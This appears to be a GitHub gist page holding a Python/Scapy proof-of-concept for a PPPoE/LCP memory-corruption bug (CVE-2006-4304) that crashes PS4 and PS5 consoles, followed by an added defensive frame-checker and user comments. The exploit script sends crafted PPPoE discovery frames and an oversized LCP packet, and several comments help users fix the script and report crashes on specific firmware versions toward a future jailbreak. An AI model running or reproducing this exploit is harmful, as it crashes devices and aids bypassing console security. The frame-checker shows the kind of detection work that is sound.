```python
from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump

source = b"\xXX\xXX\xXX\xXX\xXX\xXX"  # MAC address of your adapter on PC
destination = b"\xXX\xXX\xXX\xXX\xXX\xXX"  # MAC address of LAN on your PS4
interface = "Realtek PCIe 2.5GbE Family Controller #2"  # get via "ipconfig /all" or eth0 or similar on Linux

packet = sniff(iface=interface, filter="pppoed", count=1)
tag_value = packet[PPPoED][0].tag_list[1].tag_value
payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)
packet = sniff(iface=interface, filter="pppoed", count=1)
payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)
packet = sniff(iface=interface, filter="pppoes", count=1)
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
packet = srp1(Ether(payload), iface=interface)
hexdump(packet)  # hexdump() prints and returns None; wrapping it in print() only adds a stray "None"
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256  # this number might be different, just a guess
for i in range(20):
    sendp(payload, iface=interface)
```
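Added here as a defender-side illustration, not part of the gist and not the author's code: a dependency-free Python checker that parses the PPPoE discovery (PADO/PADS) and session (LCP) frames the script builds and reports length inconsistencies, which is the check a capture filter or IDS rule would apply to this traffic. The MAC addresses and the 8-byte Host-Uniq tag value are constructed placeholders, and the `ETH_MIN_FRAME` normalisation (frames shorter than 60 bytes are zero-padded before checking, as a NIC pads them on the wire) is an assumption of this example.

```python
import struct
from typing import Dict, List, Tuple

ETH_P_PPPOE_DISC = 0x8863  # PPPoE discovery stage (PADI/PADO/PADR/PADS/PADT)
ETH_P_PPPOE_SESS = 0x8864  # PPPoE session stage (carries PPP frames)
PPP_PROTO_LCP = 0xC021     # PPP Link Control Protocol
ETH_MIN_FRAME = 60         # assumption: NICs pad shorter frames (without FCS) up to this size

PPPOE_CODE_NAMES = {0x09: "PADI", 0x07: "PADO", 0x19: "PADR",
                    0x65: "PADS", 0xA7: "PADT", 0x00: "SESSION"}


def parse_pppoe_tags(data: bytes) -> Tuple[List[Tuple[int, bytes]], List[str]]:
    """Walk a PPPoE discovery tag list (type, length, value) and report overruns."""
    tags: List[Tuple[int, bytes]] = []
    findings: List[str] = []
    off = 0
    while off < len(data):
        if off + 4 > len(data):
            findings.append("tag header runs past the declared PPPoE payload")
            break
        tag_type, tag_len = struct.unpack("!HH", data[off:off + 4])
        if off + 4 + tag_len > len(data):
            findings.append(f"tag 0x{tag_type:04x} claims {tag_len} bytes but only "
                            f"{len(data) - off - 4} remain")
            break
        tags.append((tag_type, data[off + 4:off + 4 + tag_len]))
        off += 4 + tag_len
        if tag_type == 0x0000:  # End-Of-List tag terminates the list
            break
    return tags, findings


def check_pppoe_frame(frame: bytes) -> Dict[str, object]:
    """Parse one Ethernet frame and list every PPPoE/LCP length inconsistency."""
    findings: List[str] = []
    if len(frame) < 20:
        return {"kind": None, "findings": ["frame too short for Ethernet + PPPoE header"]}
    # Model what the receiver sees: a NIC pads short frames to the Ethernet minimum.
    # Frames taken from a live capture already arrive at or above this size.
    if len(frame) < ETH_MIN_FRAME:
        frame = frame.ljust(ETH_MIN_FRAME, b"\x00")
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype not in (ETH_P_PPPOE_DISC, ETH_P_PPPOE_SESS):
        return {"kind": None, "findings": ["not a PPPoE frame"]}
    ver_type, code, session_id, length = struct.unpack("!BBHH", frame[14:20])
    payload = frame[20:]
    kind = PPPOE_CODE_NAMES.get(code, f"code 0x{code:02x}")
    if ver_type != 0x11:
        findings.append(f"unexpected PPPoE version/type byte 0x{ver_type:02x}")
    if length > len(payload):
        findings.append(f"declared PPPoE length {length} exceeds the {len(payload)} payload bytes present")
    else:
        extra = len(payload) - length
        # Padding up to the Ethernet minimum is normal; bytes beyond it were
        # appended by the sender on purpose and are worth flagging.
        if extra > 0 and len(frame) > ETH_MIN_FRAME:
            findings.append(f"{extra} trailing bytes beyond declared PPPoE length {length}")
    body = payload[:length]
    if ethertype == ETH_P_PPPOE_DISC:
        findings.extend(parse_pppoe_tags(body)[1])
    elif len(body) >= 6:
        proto = struct.unpack("!H", body[:2])[0]
        if proto == PPP_PROTO_LCP:
            _lcp_code, _lcp_id, lcp_len = struct.unpack("!BBH", body[2:6])
            # The LCP length covers everything after the 2-byte PPP protocol field.
            if lcp_len != length - 2:
                findings.append(f"LCP length {lcp_len} disagrees with PPPoE length {length} minus 2")
    return {"kind": kind, "session_id": session_id, "length": length, "findings": findings}


def audit(frames: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Run the checker over a named set of frames; an empty list means consistent."""
    return {name: check_pppoe_frame(f)["findings"] for name, f in frames.items()}  # type: ignore[dict-item]


# Constructed sample frames mirroring the byte layouts used in the script above.
# MAC addresses and the 8-byte Host-Uniq tag value are placeholders.
SRC_MAC = bytes.fromhex("020000000001")
DST_MAC = bytes.fromhex("020000000002")
HOST_UNIQ = bytes.fromhex("0011223344556677")
LCP_CONF_REQ = DST_MAC + SRC_MAC + bytes.fromhex("8864110000010009c02101010007abff")
SAMPLE_FRAMES = {
    "PADO": DST_MAC + SRC_MAC + bytes.fromhex("886311070000000c01030008") + HOST_UNIQ,
    "PADS": DST_MAC + SRC_MAC + bytes.fromhex("886311650001000c01030008") + HOST_UNIQ,
    "LCP_CONF_REQ": LCP_CONF_REQ,
    "LCP_CONF_REQ_PADDED": LCP_CONF_REQ + b"\xff" * 256,
}

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_FRAMES).items():
        print(f"{name:20s} {'OK' if not findings else '; '.join(findings)}")
```

Run stand-alone it prints one line per sample frame. The three handshake frames come out consistent once padded to the Ethernet minimum; the last frame, which the script pads with 256 bytes of 0xff, is reported with 255 trailing bytes because its declared PPPoE length of 9 already counts one byte beyond the 8-byte LCP packet in the unpadded frame. On frames captured with `sniff()` the padding step is a no-op, so the checker can be pointed straight at `bytes(pkt)` of each captured packet.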
Hello.
I get the following error. What am I doing wrong?

```
Python 3.12.1 (tags/v3.12.1:2305ca5, Dec 7 2023, 22:03:25) [MSC v.1937 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license()" for more information.
Warning (from warnings module):
  File "C:\ps5\PS4-PS5-CVE-2006-4304.py", line 3
    source = b"\d8\5e\d3\78\cf\24" # MAC address of your adapter on PC
SyntaxWarning: invalid escape sequence '\d'
Warning (from warnings module):
  File "C:\ps5\PS4-PS5-CVE-2006-4304.py", line 4
    destination = b"\5c\84\3c\ca\fc\92" # MAC address of LAN on your PS4
SyntaxWarning: invalid escape sequence '\8'
```

Thank you
You spelled the MAC wrong, you have to put x first, example x5c
Thank you
```
C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:3: SyntaxWarning: invalid escape sequence '\D'
  source = b"\D8\BB\C1\B5\C9\96" # MAC address of your PC adapter
C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:4: SyntaxWarning: invalid escape sequence '\9'
  destination = b"\bc\60\a7\1a\96\c2" # The MAC address of the local network on your PS4
Traceback (most recent call last):
  File "C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py", line 7, in
    packet = sniff(iface=interface, filter="pppoed", count=1)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py", line 1311, in sniff
    sniffer._run(*args, **kwargs)
  File "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py", line 1171, in
```
How to fix it?
Read his solution above. You need the x in front of the characters.
Wake up, x in front of the MAC characters
```
C:\Users\REY>"C:\Python30\PS4-PS5-CVE-2006-4304.py"
.
Sent 1 packets.
.
Sent 1 packets.
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
```
After it shuts down my PS5 on 6.02. What's next?
Bro, it's a PoC, meaning piece of concept, no full jailbreak, you have to wait!
cable needs straight or reverse?
PS4/5 can do Auto MDI-X, so it doesn't matter.
proof of concept.
Will 11.02 be available?
No, this bug has been patched in 11.02.
I've made a video showing how to set this up from scratch if anyone is interested.
If anyone is curious, working on PS5 7.61
Zero zero zero zero
I tried it on PS3 and it freezes (sometimes) on the boot screen.
Received 2 packets, got 1 answers, remaining 0 packets
Works only after setting up PPPoE for the first time or after changing the username/password there. But yeah, just tested with 11.00 and it does work.
We have more info in Hacker One about this vuln, https://hackerone.com/reports/2177925 . Thanks to TheFl0w
My PS5 software version is 23.02-08 20.02.06-00.00.00.01. Am I still able to jailbreak my console, or did I miss the opportunity?
You're still in scope for a future jailbreak; wait for an exploit and don't update your console.
Is it confirmed that it works on both 8.20 versions?
Ok, I will wait. I am not gonna update my console ever.
What do you mean "works on both 8.20 versions"? Are you asking or telling us?
I was asking @unaigonzalezz because there are two different 8.20 FW versions.
There is 8.20.00 and there is 8.20.02 like yours.
Unfortunately theflow only said 8.20, which could mean either both or only 8.20.00.
Sorry that I didn't know more about jailbreaking stuff. In the past I used 9.00 on my PS4 Slim, and after a long, long time I got one more chance to use a jailbreak, and hopefully when TheFlow says 8.20 that includes all the versions.
I actually don't know, but if it is .02 it's a small change, so I don't think it's the patch for this bug, but I'm not truly sure. So the best thing you guys can do is test this script: if it crashes your console, the future exploit should work too.
Requires Python 3 and Scapy.
If it works, it will crash your console.
Should work on PS4 11.00 and lower, PS5 8.20 and lower.
This is supposedly what theflow0 reported on HackerOne.